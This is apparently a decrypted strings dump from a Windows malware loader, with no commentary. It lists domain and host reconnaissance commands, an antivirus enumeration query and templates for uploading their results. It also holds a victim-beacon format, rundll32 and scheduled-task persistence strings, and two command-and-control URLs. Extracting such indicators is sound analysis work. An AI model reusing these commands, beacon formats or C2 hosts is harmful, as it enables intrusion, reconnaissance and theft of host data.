decrypted_data.txt
/c ipconfig /all
C:\Windows\System32\cmd.exe
/c systeminfo
C:\Windows\System32\cmd.exe
/c nltest /domain_trusts
C:\Windows\System32\cmd.exe
/c net view /all /domain
/c nltest /domain_trusts /all_trusts
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe
/c net view /all
C:\Windows\System32\cmd.exe
&ipconfig=
/c net group "Domain Admins" /domain
C:\Windows\System32\cmd.exe
/Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
C:\Windows\System32\wbem\wmic.exe
/c net config workstation
C:\Windows\System32\cmd.exe
/c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
C:\Windows\System32\cmd.exe
/c whoami /groups
C:\Windows\System32\cmd.exe
&systeminfo=
&domain_trusts=
&domain_trusts_all=
&net_view_all_domain=
&net_view_all=
&net_group=
&wmic=
&net_config_ws=
&net_wmic_av=
&whoami_group=
{
"pid":
"%d",
"proc":
"%s",
"subproc": [
]
}
&proclist=[
{
"pid":
"%d",
"proc":
"%s",
"subproc": [
]
}
&desklinks=[
*.*
"%s"
]
Update_%x
Custom_update
.dll
.exe
Updater
"%s"
rundll32.exe
"%s", %s %s
runnung
:wtfbbq
%d
%s%s
files/bp.dat
%s\%d.dll
%d.dat
%s\%s
init -zzzz="%s\%s"
front
/files/
Facial
.exe
Content-Type: application/x-www-form-urlencoded
POST
GET
curl/7.88.1
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
CLEARURL
URLS
COMMAND
ERROR
eNIHaXC815vAqddR21qsuD35eJFL7CnSOLI9vUBdcb5RPcS0h6
counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
C:\WINDOWS\SYSTEM32\rundll32.exe %s
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
<html>
<!DOCTYPE
%s%d.dll
12345
&stiller=
%s%d.exe
LogonTrigger
%x%x
TimeTrigger
PT0H%02dM
%04d-%02d-%02dT%02d:%02d:%02d
&mac=
%02x
:%02x
PT0S
;
&computername=%s
&domain=%s
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
\*.dll
%04X%04X%04X%04X%08X%04X
%04X%04X%04X%04X%08X%04X
\Registry\Machine\
https://jarinamaers.shop/live/
https://wrankaget.site/live/
AppData
Desktop
Startup
Personal
Local AppData